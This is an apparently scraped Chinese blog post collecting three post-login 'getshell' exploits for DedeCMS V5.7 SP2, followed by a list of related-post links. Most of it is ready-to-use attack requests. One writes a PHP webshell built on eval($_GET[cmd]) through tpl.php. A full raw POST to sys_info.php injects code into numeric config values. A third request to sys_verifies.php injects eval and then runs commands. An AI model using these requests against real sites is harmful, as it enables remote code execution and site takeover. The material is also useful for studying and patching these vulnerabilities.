2. 程式人生 > >dedecms V5.7 SP2 web後臺getshell

dedecms V5.7 SP2 web後臺getshell

阿新 發佈:2018-11-15

1後臺getshell

https://www.freebuf.com/vuls/164035.html
https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS V5.7 SP2後臺存在程式碼執行漏洞
dede/tpl.php任意檔案寫入漏洞。
條件:已登入後臺。

  1. 首先訪問/dede/tpl.php?action=upload獲取token值
    在這裡插入圖片描述
  2. 訪問/dede/tpl.php?filename=<yourname>.lib.php&action=savetagfile&content=<%
    [email protected]    ($_GET[cmd])%3b%3f>&token=<your_token>
    即可在/include/taglib/yourname.lib.php生成webshell。
    在這裡插入圖片描述
  3. 然後直接訪問即可。
    在這裡插入圖片描述

在發表軟體或者文章的時候,若出現沒有對應的 欄目,則可以在後臺進行設定。
在這裡插入圖片描述

2 /dede/sys_info.php通過更改系統配置getshell

來源:https://xz.aliyun.com/t/2071
思路:把語句寫入inc檔案,然後在其他的include語句中,包含了惡意程式碼進而getshell。
在進行普通的字串設定的時候,後臺會把單引號過濾掉,比如為在ftp_user那裡寫了phpinfo(),後臺得到的內容為:

$cfg_ftp_user = 'xxx;phpinfo()';

而如果在數字型的配置中寫入phpinfo(),則得到:

$cfg_ftp_port = 21;phpinfo();

POST /dede/sys_info.php HTTP/1.1
Host: 192.168.170.139
Content-Length: 224
Cache-Control: max-age=0
Origin: http://192.168.170.139
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3590.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.170.139/dede/sys_info.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=nbk8c8n5g5q0qmejc0vb95qs9f; met_auth=901eW8fD%2FVlpik8rnTb0yQIFO214LjRemr5nSH3ZjGjWkgEQlatZlgc2uBFpu2YFwomaf6YjyY8vlgqTFAGahxzZUA; met_key=H57xvPc; langset=cn; upgraderemind=1; lastCid=1; _csrf_name_e5f4de18=7fa3a717da97d0bd6c0e88a1b9385903; _csrf_name_e5f4de18__ckMd5=0af67c6d2900105f; DedeUserID=3; DedeUserID__ckMd5=f75fbc53eccce161; DedeLoginTime=1542006832; DedeLoginTime__ckMd5=1eb3820ff2689cce; last_vtime=1542006840; last_vtime__ckMd5=018893a36a2a96c5; last_vid=77caikiki; last_vid__ckMd5=8150fc0e0329f2f6; lastCid__ckMd5=601187a898a21c80; ENV_GOBACK_URL=%2Fmember%2Fuploads_select.php
Connection: close

token=663f3e32190a6f95e39419c2c3a76f19&dopost=save&edit___cfg_ftp_host=&edit___cfg_ftp_port=21;phpinfo()&edit___cfg_ftp_user=&edit___cfg_ftp_pwd=&edit___cfg_ftp_root=%2F&edit___cfg_ftp_mkdir=N&imageField.x=42&imageField.y=13

注意這裡的token為get這個頁面是得到的token。
在這裡插入圖片描述
在這裡插入圖片描述

其實通過檢視配置檔案,發現可以插入的點還挺多的,只要不是字串型的數字型的應該都可以。
比如$cfg_arcautosp_size,可以通過POST傳入:edit___cfg_arcautosp_size=5;phpinfo()即可。
在這裡插入圖片描述

3 getshell

https://xz.aliyun.com/t/2237
首先:

GET /dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\%22;eval($_GET[cmd]);die();//

然後訪問:

GET /dede/sys_verifies.php?action=down&cmd=phpinfo();

在這裡插入圖片描述

相關推薦

dedecms V5.7 SP2 web後臺getshell

1後臺getshell https://www.freebuf.com/vuls/164035.html https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS V5.7 SP2後臺存在程式碼執行漏洞 ded

dedecms v5.7 sp2前臺任意使用者登入(包括管理員)

dedecms v5.7 sp2前臺任意使用者登入(包括管理員) 前言 我們繼續來說一下dedecms最新的幾個漏洞,今天是一個前臺任意使用者登入的漏洞,該漏洞結合上一次提到的前臺任意密碼修改漏洞可以直接修改管理員的密碼,剩下的就是找後臺了,廢話不多說,我們開始吧 漏洞版本

CVE-2018-20129:DedeCMS V5.7 SP2前臺檔案上傳漏洞

一、漏洞摘要 漏洞名稱: DedeCMS V5.7 SP2前臺檔案上傳漏洞上報日期: 2018-12-11漏洞發現者: 陳燦華產品首頁: http://www.dedecms.com/軟體連結: http://updatenew.dedecms.com/base-v57/packa

CVE-2018-20129:DedeCMS V5.7 SP2前臺文件上傳漏洞

oba sid img name multi def close -a 代碼 一、漏洞摘要 漏洞名稱: DedeCMS V5.7 SP2前臺文件上傳漏洞上報日期: 2018-12-11漏洞發現者: 陳燦華產品首頁: http://www.dedecms.com/軟件鏈接:

CVE-2018-20129-——DedeCMS V5.7 SP2前臺檔案上傳漏洞

0x01 漏洞概述 Desdev DedeCMS(織夢內容管理系統)是中國卓卓網路(Desdev)科技有限公司的一套開源的集內容釋出、編輯、管理檢索等於一體的PHP網站內容管理系統(CMS)。 Desdev DedeCMS 5.7 SP2版本中的uploads/include/dial

DedeCMS V5.7 SP2前臺檔案上傳漏洞(CVE-2018-20129)

DedeCMS V5.7 SP2前臺檔案上傳漏洞(CVE-2018-20129) 一、漏洞描述 織夢內容管理系統(Dedecms)是一款PHP開源網站管理系統。Dedecms V5.7 SP2版本中的uploads/include/dialog/select_images_post.php檔案存在檔案上傳漏洞

Dedecms 5.7 SP2後臺getshell

Dedecms 5.7 SP2後臺getshell 前言 最近也打算研究研究各大cms的漏洞了,正好看到一篇關於dedecms後臺getshell的文章,所以也自己動手復現一下,這樣以後遇到了也更容易上手。該漏洞涉及的版本是dedecms的最新版吧,下載地址:

Dedecms V5.7後臺的兩處getshell

在這個帖子裡我把兩個洞一起寫出來。 第一個是常見的思路,把語句寫入inc檔案,然後在其他的include語句中,包含了惡意程式碼進而getshell。漏洞程式碼在:/dede/sys_verifies.php 程式碼如下: else if ($action == 'getfiles') {

程式碼審計| DEDECMS -V5.7-UTF8-SP2-20180109漏洞集合

最近dedeCMS爆了好多洞(0day),於是將最近的漏洞進行復現和整理便成為了本篇漏洞集合。 最近dedeCMS爆了好多洞(0day),於是將最近的漏洞進行復現和整理便成為了本篇漏洞集合。期待師傅們的指導與交流。 cookie偽造導致任意前臺使用者登入 0×00 相關環境

Dedecms v5.7 CKEditor編輯器回車將<br>和<div>改了<p>的解決方法

dedecms 編輯器Dedecms v5.7 SP1的Ckeditor編輯器有些改動,默認為回車鍵換行、Shift+Enter換段落,但各位站長朋友都習慣了直接敲回車換段落,查看後發現它的配置文件裏是可以修改解決的,其實你可以把下面的代碼註釋掉就可以采用另外一種模式了(enter換段落):1、找到:安裝目

DeDeCMS v5.7 密碼修改漏洞(附PoC)

原文:https://paper.seebug.org/507/ 參考: https://xz.aliyun.com/t/1959 https://xz.aliyun.com/t/1961 安裝 注意安裝之後,註冊會員預設是需要後臺admin稽核的,這裡需要admin在後臺修改一

DeDeCMS v5.7 密碼修改漏洞

先拿到admin的前臺許可權 1.註冊0000001使用者名稱的賬號 稽核通過(或者設定為不需稽核) 2. 訪問/member/index.php?uid=0000001。 注意只有訪問了/membe

Dedecms V5.7 關於session

使用 fff 關於 test 啟動 class () blog .html 在dedecmsv5.7裏面使用session的話要註意開啟方式!和PHP源碼裏的使用方式不一樣!!! 開啟session,前面必須要@ @session_start(); 啟動session,前面

最新版 ueditor 1.2.4.0 PHP 版 與 dedecms v5.7 整合

最新版 ueditor 1.2.4.0 PHP 版 與 dedecms v5.7 整合。整合功能說明: 1. 圖片上傳目錄自己進行了調整。路徑格式是 “/upfiles/allimg/2013/01/17/r44101358393882.jpg”。 2. 以後升級方便,調整

代碼審計-DedeCMS-V5.7前臺任意用戶密碼重置

漏洞分析 cti question 兩個 int 等於 允許 浮點 rdquo 0x01 漏洞影響 該漏洞允許攻擊者修改任意前臺用戶密碼。 0x02 漏洞利用條件 1,開啟會員模塊 2,攻擊者擁有一個正常的會員賬號 3,目標沒有設置安全問題 0x03

dedeCMS遠程寫入getshell(測試版本V5.7

ext 獲取 dmi 訪問 ges onf all lang unset 該漏洞必須結合apache的解析漏洞: 當Apache檢測到一個文件有多個擴展名時,如1.php.bak,會從右向左判斷,直到有一個Apache認識的擴展名。如果所有的擴展名Apache都不認識,那麽

DedeCMS---V5.7_UTF8_SP1、SP2---任意前臺用戶登錄(cookie偽造)

!= 為我 BE OS tex AD gpo cut body 漏洞觸發點在include/memberlogin.class.php中的MemberLogin類中的登錄校驗函數 //php5構造函數 function __construct($kptime =

[好好學習]在VMware中安裝Oracle Enterprise Linux (v5.7)

[書接上一回]在Oracle Enterprise Linux (v5.7) 中安裝DB - (4/4)

學習 查詢 src log 成功 尋找 image 需要 密碼 選擇自己創建的安裝數據庫路徑。 Sample Schemas 打鉤。 調整內存大小。 選擇官方建議的字符集編碼。 是否創建創建的腳本,如需要請

[書接上一回]在Oracle Enterprise Linux (v5.7) 中安裝DB - (3/4)

www 數據庫 splay spl x86-64 width .html nbsp eight 安裝p10404530_112030_Linux-x86-64_6of7.zip解壓下的example。 修改軟件路徑,為dbhome_1.